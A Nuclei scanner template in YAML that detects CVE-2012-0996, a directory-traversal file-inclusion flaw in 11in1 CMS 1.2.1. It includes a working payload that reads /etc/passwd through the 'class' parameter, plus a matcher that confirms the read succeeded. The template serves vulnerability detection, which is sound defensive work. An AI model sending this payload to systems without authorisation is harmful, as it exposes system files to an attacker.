39 lines
1.0 KiB
YAML
39 lines
1.0 KiB
YAML
id: CVE-2012-0996
|
|
|
|
info:
|
|
name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
|
|
author: daffainfo
|
|
severity: high
|
|
description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/36784
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-0996
|
|
- https://www.htbridge.ch/advisory/HTB23071
|
|
remediation: Upgrade to a supported version.
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cve-id: CVE-2012-0996
|
|
cwe-id: CWE-22
|
|
cvss-score: 5.0
|
|
tags: cve,cve2012,lfi,edb
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/02/18
|